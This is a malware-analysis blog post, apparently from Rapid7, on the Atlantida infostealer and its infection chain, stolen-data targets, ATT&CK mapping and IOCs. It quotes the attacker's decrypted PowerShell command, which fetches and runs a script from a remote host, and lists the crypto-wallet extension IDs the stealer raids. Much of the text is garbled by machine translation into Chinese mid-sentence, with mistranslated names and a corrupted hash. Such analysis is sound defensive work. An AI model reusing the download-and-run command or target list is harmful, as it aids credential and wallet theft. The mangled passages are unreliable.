Last updated at Tue, 27 Feb 2024 16:14:43 GMT

Recently, Rapid7 observed a new stealer named Atlantida. 窃取者诱骗用户从被入侵的网站下载恶意文件, 并使用了几种逃避技术,如反射加载和注入之前,偷窃者加载.

Atlantida窃取了Telegram等软件的大量登录信息, Steam, several offline cryptocurrency wallets data, 浏览器存储数据以及加密货币钱包浏览器扩展数据. 它还捕获受害者的屏幕并收集硬件数据.

Technical Analysis

Stage 1 - Delivery

The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, 我们观察到一个Visual Basic脚本解密一个硬编码的base64字符串并执行解密后的内容:

The decrypted command : “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm hxxp://166.1.160[.]10/loader.txt | iex“ .

Stage 2 - Three levels of in-memory loading

执行的PowerShell命令在内存中下载并执行下一阶段的PowerShell脚本.

PowerShell脚本下载并反射加载a .NET downloader. The .NET downloader is a simple downloader that calls DownloadData API function to get a Donut injector. Donut 是一个位置无关的代码,使在内存中执行VBScript, JScript, EXE, DLL files and .NET assemblies. Next, the Donut is injected to newly created “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe” by using a Remote Thread Injection Technique (aka CreateRemoteThread). 这种技术的工作方式是将shellcode写入另一个符合条件的进程的上下文中,并为该进程创建一个线程来运行负载.

Figure 4 - .Net downloader Main function

Stage 3 - Atlantida Stealer

甜甜圈注入器用于装载最后的有效载荷,在我们的例子中是一架新的亚特兰大偷窃者. 它以可执行文件中的字符串命名.

首先,亚特兰大市窃取者通过使用组合来捕获整个屏幕 GetDC, CreateCompatibleDC,CreateDIBSection, SelectObject和BitBlt API function combination. Next, it checks if a Filezilla (open source FTP software, 允许用户将文件从本地计算机传输到远程计算机)最近的服务文件存在. It does that by attempting to open “C:\Users\username\AppData\Roaming\FileZilla\ recentservers.xml” if it does, it reads the file. Next, 它通过枚举钱包路径下的文件来查找以下离线加密货币钱包:

窃取程序读取枚举路径下找到的所有文件.

接下来,它收集受害者的硬件数据,如RAM, GPU, CPU和屏幕分辨率. 窃取者列举用户的桌面文件夹并读取所有文本文件(.txt). 它还通过枚举“C:\Users\Username\AppData\Roaming\Binance”目录并读取其下的所有JSON文件来查找Binance钱包凭证.

Steam(电子游戏数字发行服务)的配置和凭证也在Atlantida stealer的兴趣中,因为我们观察到它列举了Steam配置目录并搜索以下文件:

  1. Ssfn - Steam Sentry File.
  2. Config.vdf - Steam configuration file.
  3. Loginusers.vdf -存储以前登录的Steam帐户的记录.
Figure 6 - Steam files enumeration

亚特兰蒂斯收集的最后一件事是电报的数据. 它收集位于“C:\Users\Username\AppData\Roaming\Telegram Desktop\tdata”中的所有数据。.

The stealer now connects to the hard coded C&C server (45.144.232.99). 我们访问了硬编码的IP并进入了登录页面我们认为是一个盗贼控制面板, which also had an `Atlantida` title.

Figure 7 - Atlantida login page


No data is passed to the C&C服务器这次和小偷继续他的收集. Differently from other stealers, 亚特兰大只关注三种浏览器:谷歌Chrome, Mozilla Firefox and Microsoft Edge. 它窃取所有存储的密码,cookie,令牌,信用卡和自动填充.

其中一个值得注意的功能是它能够从基于chrome的浏览器扩展中窃取数据. 对于每个基于chrome的扩展,给出一个“扩展ID”. 恶意软件利用这些信息来获取存储在其中的数据. 亚特兰大从以下加密货币钱包扩展中收集数据:

Extension Name Extension ID
Metamask nkbihfbeogaeaoehlefnkodbefgpgknn
Sollet fhmfendgdocmcbmfikdcogofphimnkno
BNB chain wallet fhbohimaelbohpjbbldcngcnapndodjp
Phantom bfnaelmomeimhlpmgjnjophhpkkoljpa
Metawallet bkklifkecemccedpkhcebagjpehhabfb
Yoroi ffnbelfdoeiohenkjibnmadjiehjhajb
Nami lpfcbjknijpeeillifnkikgncikgfhdo
Flint hnhobjmcibchnmglfbldbfabcgaknlkj
CardWallet apnehcjmnengpnmccpaibjmhhoadaico
Guildwallet nanjmdknhkinifnkgdcggcfnhdaammmj
TronWallet pnndplcbkakcplkjnolgbkdgjikjednm
CryptoAirdrops dhgnlgphgchebgoemcjekedjjbifijid
Bitoke oijajbhmelbcoclnkdmembiacmeghbae
Coin89 aeachknmefphepccionboohckonoeemg
XDefiWallet hmeobnfnfcmdkdcmlblgagmfpfboieaf
Keplr dmkamcknogkgcdfhhbddcghachkejeap
FreaksAxie copjnifcecdedocejpaapepagaodgpbh
Oasis ppdadbejkmjnefldpcdjhnkpbjkikoip
Rabby acmacodkjbdgmoleebolmdjonilkdbch
MathWallet afbcbjpbpfadlkmhmclhkeeodmamcflc
NiftyWallet jbdaocneiiinmjbjlgalhcelgbejmnid
Guarda hpglfhgfnhbgpjdenjgmdgoeiappafln
EQUALWallet blnieiiffboillknjnepogjhkgnoapac
BitAppWallet fihkakfobkmkjojpchpfgcmhfjnmnfpi
iWallet kncchdigobghenbbaddojjnnaogfppfj
Wombat amkmjjmmflddogmhpjloimipbofnfjih
MEW CX nlbmnnijcnlegkjjpcfjclmcfggfefdm
GuildWallet nkddgncdjgjfcddamfgcmfnlhccnimig
Saturn Wallet cphhlgmgameodnhkjdmkpanlelnlohao
CloverWallet nhnkbkgjikgcigadomkphalanndcapjk
LiqualityWallet kpfopkelmapcoipemfendmdcghnegimn
TerraStation aiifbnbfobpmeekipheeijimdpnlpgpp
AuroWallet cnmamaachppnkjgnildpdmkaakejnhae
Polymesh Wallet jojhfeoedkpkglbfimdfabpdfjaoolaf
ICONex flpiciilemghbmfalicajoolhkkenfel
NaboxWallet nknhiehlklippafakaeklbeglecifhad
KHC hcflpincpppdclinealmandijcmnkbgn
Temple ookjlbkiijinhpmnjffcofjonbfbgaoc
TezBox mnfifefkajgofkcjkemidiaecocnkjeh
CyanoWallet dkdedlpgdmmkkfjabffeganieamfklkm
Byone nlgbhdfgdhgbiamfdfmbikcdghidoadd
OneKey infeboajgfhgbjpjbeppbkgnabfdkdaf
Leaf Wallet cihmoadaighcejopammfbmddcmdekcje
BitClip ijmpgkjfkbfhoebgogflfebnmejmfbml
NashExtension onofpnbbkehpmmoabgpcpmigafmmnjhl
HyconLiteClient bcopgchhojmggmffilplmbdicgaihlkp

当窃取者完成收集后,所有数据被压缩并发送到C&C server. Then the malware exists.

Rapid7 Customers

For Rapid7 MDR and InsightIDR customers, 以下攻击者行为分析(ABA)规则目前正在部署,并对本博客中描述的活动发出警报:

  • Suspicious Process - MSHTA Spawns PowerShell

MITRE ATT&CK Techniques:

Tactic Technique **Details
Execution User Execution: Malicious File (T1204.002) A user downloads and executes malicious .hta file
Execution Command and Scripting Interpreter: Visual Basic (T1059.005) .hta contains malicious VBScript function
Execution Command and Scripting Interpreter:Powershell (T1059.001) VBScript执行powershell下载powershell脚本
Command and Control Ingress Tool Transfer (T1105) A powershell script downloads an additional .Net Loader
Defense Evasion Reflective Code Loading (T1620) Powershell script executed the loader reflectively
Defense Evasion Process Injection (T1055) The .Net loader injects into RegAsm.exe process
Credential Access 来自密码存储库的凭据:来自Web浏览器的凭据(T1555.003) 亚特兰大窃取存储的浏览器数据,如密码,cookie,令牌,信用卡和自动填充
Credential Access Credentials from Password Stores (T1555) Atlantida窃取离线加密货币钱包数据和其他软件数据
Discovery System Information Discovery (T1082) Atlantida collects victim’s hardware information
Collection Screen Capture (T1113) Atlantida captures victim’s screen
Exfiltration Exfiltration Over C2 Channel (T1041) Atlantida exfiltrats all collected data

IOCs

IOC SHA-256 Notes
ReadEra_v1.4.2.hta 67年b8776b9d8f581173bcb471e91ff1701cafbc92aaed858fe3cb26a31dd6a6d8 Malicious .hta file
http://166.1.160[.]10/loader.txt Malicious powershell script
http://166.1.160[.]10/www_c.bin f935143dba2fb65eef931c1dac74a740e58e9e911a13457f4cfa4c73a0c673b3 Stores .Net Loader
http://166.1.160[.]10/www.bin 350216884486 d1fafbd60e1d9c87c48149b058e4fab6b9a2a5cd7ea67ab250a0 Stores Donut shellcode
AtlantidaStealer.exe b4f4d51431c4e3f7aeb01057dc851454cff4e64d16c05d9da12dfb428715d130 Atlantida stealer
45.144.232[.]99 C&C server